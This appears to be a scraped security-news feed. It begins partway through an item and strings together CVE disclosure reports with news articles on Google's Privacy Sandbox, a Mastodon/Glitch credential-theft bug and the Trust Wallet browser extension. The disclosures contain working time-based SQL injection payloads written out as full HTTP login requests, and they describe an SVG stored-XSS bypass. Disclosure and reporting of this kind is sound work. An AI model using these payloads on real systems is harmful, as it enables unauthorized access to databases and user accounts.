    Cookie: ci_session=pq7i0frcc6092gm4porg5cvqj5e9n54q; PHPSESSID=ngqgr9p2erqb85jg0veeql3i15
    Connection: close
    
    username=12%27+AND+%28SELECT+2348+FROM+%28SELECT%28SLEEP%2815%29%29%29zxcv%29+AND+%27bnm%27%3D%27bnm&password=ab&login=
    

SELECT(SLEEP(15)), The server response time is 15 seconds

CVE-2022-43135: bug_report/SQLi-1.md at main · junHVV/bug_report

Zenario CMS 9.3.57186 is vulnerable to Cross Site Scripting (XSS) via svg,Users & Contacts.

**Summary**  
hi team,  
I found Stored XSS in upload file svg version 9.0.54156 reported the vulnerability with CVE-2021-41952, in version 9.3.57186 i have bypassed it  
visit : #1 to view my report

**Info**  
Zenario 9.3.57186 last version  
FireFox 105.0.3 (64-bit)  
Chrome 106.0.5249.119

_**I will recreate it again**_  
**Steps**

1.  Login home page >> Choose **Users & Contacts** and create any user
    
2.  Click **Image** >> Upload an image  
    
3.  payload i inject to svg  
    
4.  go to link file inject , paypload executed

CVE-2022-44073: XSS upload file SVG in Zenario 9.3.57186 · Issue #6 · hieuminhnv/Zenario-CMS-last-version

Human Resource Management System v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /hrm/controller/login.php.

**Human Resource Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Deven

vendors:https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html

Vulnerability File: /hrm/controller/login.php

POST parameter 'password' exists SQL injection vulnerability

Payload1: name=ab&password=cd'&submit=Sign+In

    POST /hrm/controller/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=vilo7csum7e88k93vn9tfo8beb
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/hrm/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 35
    
    name=ab&password=cd'&submit=Sign+In
    

Payload2: name=ab&password=cd''&submit=Sign+In

    POST /hrm/controller/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=vilo7csum7e88k93vn9tfo8beb
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/hrm/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 36
    
    name=ab&password=cd''&submit=Sign+In
    

Payload3: name=ab&password=cd'%2b(select\*from(select(sleep(5)))q)%2b'&submit=Sign+In

    POST /hrm/controller/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=vilo7csum7e88k93vn9tfo8beb
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/hrm/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 74
    
    name=ab&password=cd'%2b(select*from(select(sleep(20)))q)%2b'&submit=Sign+In
    

The server response time is 20 seconds

CVE-2022-43262: bug_report/SQLi-1.md at main · null302/bug_report

Internet behemoth Google on Tuesday said it plans to roll out Privacy Sandbox for Android in beta to mobile devices running Android 13 starting early next year.
"The Privacy Sandbox Beta will be available for ad tech and app developers who wish to test the ads-related APIs as part of their solutions," the company said.
To that end, developers will need to complete an enrollment process in order

Internet behemoth Google on Tuesday said it plans to roll out Privacy Sandbox for Android in beta to mobile devices running Android 13 starting early next year.

"The Privacy Sandbox Beta will be available for ad tech and app developers who wish to test the ads-related APIs as part of their solutions," the company said.

To that end, developers will need to complete an enrollment process in order to utilize the ads-related APIs, including Topics, FLEDGE, and Attribution Reporting.

Topics, which replaced Federated Learning of Cohorts (FLoC) earlier this year, aims to categorize user interests under different "topics" based on their device web browsing history. These inferred interests are then shared with marketers to serve targeted ads.

FLEDGE and Attribution reporting, on the other hand, enable custom audience targeting and help measure ad conversions without relying on cross-party user identifiers, respectively.

Organizations can also request access for a limited number of devices to test the Beta, plus register any apps which will utilize the Privacy Sandbox APIs.

The development comes after the search and advertising giant expanded the initiative to include its mobile operating system in February 2022, and followed it up with a developer preview in May 2022.

Privacy Sandbox is an effort led by Google to create a set of web standards for websites to access user information without compromising on privacy. It aims to facilitate online advertising without resorting to invasive methods like third-party tracking cookies or fingerprinting.

That said, the company's plans to turn off third-party cookies in the Chrome web browser have been delayed twice, with the technology now expected to be phased out sometime in the second half of 2024.

To complicate matters further, the proposals have drawn criticism from rival browser vendors like Mozilla Firefox and developers of other Chromium-based browsers such as Brave, Opera, and Vivaldi, who have said the newer methods would cement "Google's position as a web monopolist."

DuckDuckGo, which blocks Privacy Sandbox through its Chrome browser extension as of May 2022, said Topics allows Google to surveil users' online activities and share that information with advertisers for behavioral targeting without their consent.

"This targeting, regardless of how it's done, enables manipulation (ex. exploiting personal vulnerabilities), discrimination (ex. people not seeing job opportunities based on personal profiles), and filter bubbles (ex. creating echo chambers that can divide people) that many people would like to avoid," the company noted.

Despite the pushback, Google said it's looking to engage with the broader ecosystem and gather "continued feedback as we enter this next phase of testing."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google to Roll Out Privacy Sandbox Beta on Android 13 by Early 2023

Patched bug could have leaked credentials

Jessica Haworth 15 November 2022 at 15:39 UTC  
Updated: 15 November 2022 at 15:47 UTC

Patched bug could have leaked credentials

  

Attackers could steal password credentials from Mastodon users due to a vulnerability in Glitch, a fork of Mastodon, a researcher has warned.

Mastodon has risen in popularity in recent weeks, as many users moved to the social media platform as a replacement for Twitter, recently acquired by controversial businessman Elon Musk.

“Everybody on infosec Twitter seemed to be jumping ship to the infosec.exchange Mastodon server, so I decided to see what the fuss was all about,” Gareth Heyes, of PortSwigger Research\*, wrote in a blog post released today.

Heyes found he was able to steal users’ stored credentials using Chrome’s autofill feature by tricking them into clicking a malicious element he had disguised as a toolbar.

Read more of the latest news about web security vulnerabilities

  
After discovering that Mastodon allows users to post HTML, Heyes found out from other users that he was able to spoof a blue ‘official’ tick in his username by inputting .

He placed the string inside an anchor text node that was inside the title attribute by doing the following:

Input:

Output:

This allowed Heyes to successfully bypass the HTML filter due to the replacement of the verified placeholder with an image that contained double quotes.

“The filter was completely destroyed as I could just inject arbitrary HTML, but one last thing stood in my way: they used a relatively strict Content Security Policy (CSP),” wrote Heyes.

“Pretty much each resource was limited to infosec.exchange, with the exception of iframes which allowed any HTTPS URL.”

**Spoofed**

Heyes then realised he could inject form elements, allowing him to spoof a password form which, when combined with Chrome autofill, would allow an attacker access to the credentials.

Worse still, the researcher was able to spoof the toolbar below. Where a user clicked on any elements of the spoofed toolbar, it would send their credentials to an attacker's server.

Heyes tested Chrome to see if it would still autofill the credentials when the inputs were invisible. If an attacker used an opacity value of zero, Chrome would still conveniently fill in the credentials.

Due to the CSP, Heyes couldn’t use inline styles. However, looking at the CSS files, he found a class that had “in a couple of seconds”, which “worked perfectly”.

He explained to The Daily Swig: “Add the PoC code into post text area and hit publish – \[the\] user sees \[the\] post and clicks on what they think is a Mastodon toolbar. Credentials are \[then\] sent to an external server.

“In a real attack the credentials will be stored and the user redirected back to the site.”

**Mitigations**

Any Mastodon instance using the Gitch fork of Mastodon is vulnerable, Heyes explained, adding that since the server is vulnerable, “there’s not much a user can do to protect themselves”.

He added: “However, it would be a good idea to only autofill your password with user interaction to prevent credentials from being stolen.”

Heyes reported the bug directly to Glitch. Contributors have released a patch for the issue, which is available on the Glitch repo.

\* PortSwigger Research is the research arm of PortSwigger Ltd, the parent company of The Daily Swig.

YOU MAY ALSO LIKE Google Pixel screen-lock hack earns researcher $70k

Mastodon users vulnerable to password-stealing attacks

By Deeba Ahmed
The extension will support all EVM chains and Solana.
This is a post from HackRead.com Read the original post: Trust Wallet Launches Browser Extension Wallet for Desktop

Binance’s Trust Wallet has launched a new browser extension wallet. The world’s leading multi-chain wallet provider’s brand-new extension for desktops will support all EVM chains and Solana. It will provide an enhanced dApp experience to users as they can explore things beyond CEXs (centralized exchanges).

**Trust’s Browser Extension Wallet Details**

This wallet is compatible with Chrome, Opera, and Brave browsers and syncs with Trust Wallet’s mobile wallet. For your information, Trust’s mobile wallet is one of the best mobile crypto wallets in the world, with over 60 million downloads. It receives ten million active users per month, which indicates its global appeal.

As per Trust Wallet CEO Eowyn Chen, users had been requesting for Browser extension with the same quality of experience as they receive on the Trust Wallet Mobile App, including multi-chain coverage. The company tried to empower users regarding the choice of device when accessing the wallet, which led to the development of the new browser wallet.

“This is our initial step, and we will listen to users’ and developers’ feedback to improve,” Chen noted.

Trust Mobile Wallet features such as multi-wallet support, fiat on-ramp and NFT support, and non-EVM blockchain integrations will be added to the new browser extension apart from unique features like hardware wallet support.

**What’s in it for Users?**

Both mobile and desktop versions of the wallet would offer enhanced Web3 accessibility and a seamless wallet experience across the two environments. It enables users to securely store, send/receive, and manage data easily.

The desktop browser extension wallet would let users receive more than eight million tokens across Solana and all available EVM chains, such as Ethereum, Polygon, BNB Chain, and Avalanche. Users can also custom-add EVM chains. It is worth noting that non-EVMs will also be added in the future.

Furthermore, the wallet extension is expected to improve the multi-chain user experience. With network auto-detect, users will enjoy a seamless dApp experience without manually adding networks. Eight million tokens are available out of the box to ease the demand for the manual addition of tokens and improve asset traceability.

In short, the new browser extension wallet will offer an optimized dApp experience so that users “effectively discover things beyond centralized exchanges (CEXs), like Web3 gaming, metaverse, DeFi, tokens not found on CEX, and more,” the company’s press release explained.

1.  Ankr Launches Chainscanner Blockchain Explorer Tool
2.  Improving privacy – Alternative browsers and chrome extensions
3.  Can This Browser Extension Really Protect You From Cybercrime?

Tag

#chrome